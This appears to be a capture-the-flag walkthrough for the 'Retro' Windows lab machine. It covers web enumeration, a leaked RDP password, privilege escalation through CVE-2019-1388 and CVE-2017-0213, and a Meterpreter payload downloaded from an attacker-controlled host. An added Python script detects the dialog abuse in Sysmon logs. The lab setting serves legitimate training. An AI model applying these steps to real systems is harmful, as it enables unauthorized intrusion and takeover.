Retro


Intro

Room Info

🔗 Name

🎯 Target IP

10.10.181.110

📈 Difficulty level

🟢 Easy

💲 Subscription type

Free

🪟 OS

Windows


Recon

Enumerate the web server's directories.

The enumeration finds a folder named /retro.

Use a browser to navigate to:

  • http://10.10.181.110/retro/index.php/2019/12/09/ready-player-one/

📌 The user Wade left a comment containing his password.

Use the credentials to log in to the target via the open RDP port 3389:

  • Wade:parzival

I suggest setting the Remmina RDP resolution to a higher one, e.g.:

  • Open Remmina, click + to create a Quick RDP Connect, select the resolution and Save as Default

  • 🚩 Open the user.txt file on Wade's user desktop to get the first flag.


Exploitation

Open Internet Explorer to initialize it.

Open Google Chrome and set it as the default web browser in Windows.

The bookmarked link refers to CVE-2019-1388 (Windows Certificate Dialog Elevation of Privilege Vulnerability).

Check the Recycle Bin and restore the hhupd file.

Exploit the privesc vulnerability present in the Windows Certificate Dialog Box and run cmd with Administrator privileges.

  • Even after the initialization of both the IE and Chrome browsers, there might not be any option for selecting the browser in the opened window.
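
Seen from the defender's side, the dialog abuse above shows up in process-creation logs as a browser started by the UAC consent process with SYSTEM integrity, followed by a shell started from that browser. The Python check below is an added example, not part of the original write-up; the field names follow Sysmon Event ID 1, and the browser list, function names and sample events are assumptions constructed for illustration.

```python
import ntpath

BROWSERS = {"iexplore.exe", "chrome.exe", "msedge.exe", "firefox.exe"}  # assumed list
SHELLS = {"cmd.exe", "powershell.exe"}

def base(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path or "").lower()

def is_system(event):
    """True when the new process has SYSTEM integrity or runs as the SYSTEM account."""
    return (event.get("IntegrityLevel", "").lower() == "system"
            or event.get("User", "").upper().endswith("\\SYSTEM"))

def classify(event):
    """Return a finding label for one process-creation event, or None."""
    image, parent = base(event.get("Image")), base(event.get("ParentImage"))
    if not is_system(event):
        return None
    if parent == "consent.exe" and image in BROWSERS:
        return "browser launched by UAC consent dialog as SYSTEM"
    if parent in BROWSERS and image in SHELLS:
        return "shell launched by a SYSTEM-level browser"
    return None

def scan(events):
    """Return (UtcTime, Image, finding) for every suspicious event."""
    return [(e["UtcTime"], e["Image"], f) for e in events if (f := classify(e))]

# Constructed sample events (not captured from the target in this write-up).
SAMPLE_EVENTS = [
    {"UtcTime": "2024-01-01 10:00:01", "User": "LAB\\user", "IntegrityLevel": "Medium",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"UtcTime": "2024-01-01 10:05:12", "User": "NT AUTHORITY\\SYSTEM", "IntegrityLevel": "System",
     "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "ParentImage": r"C:\Windows\System32\consent.exe"},
    {"UtcTime": "2024-01-01 10:06:40", "User": "NT AUTHORITY\\SYSTEM", "IntegrityLevel": "System",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe"},
    {"UtcTime": "2024-01-01 10:09:03", "User": "LAB\\admin", "IntegrityLevel": "High",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(*hit, sep=" | ")
```

Only the second and third sample events are flagged; an ordinary elevated cmd started from explorer.exe is left alone because it does not run with SYSTEM integrity.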

Meterpreter

Generate a manual payload to get a Metasploit Meterpreter session on the target.

Download the payload in the target's browser from this link:

  • http://10.18.65.48/unprivileged-payload.exe

Open Metasploit and set up a handler to listen on port 4444.

Run the unprivileged-payload.exe file on the target machine.

Wade Privileges Meterpreter

Get systeminfo from the target and save the output to a file.


Privilege Escalation

Exploit CVE-2017-0213 (Windows COM Elevation of Privilege Vulnerability).

  • Download the CVE-2017-0213_x64.zip package, unzip it and upload the CVE-2017-0213_x86.exe to the target.

Run the CVE-2017-0213_x86.exe file from the Meterpreter session or using the RDP connection on the target.

  • Check the CMD as Administrator session on the target.

Elevated CMD Session
  • 🚩 Read the root.txt file

  • Remember that there can be other attack vectors to exploit the target's vulnerabilities.

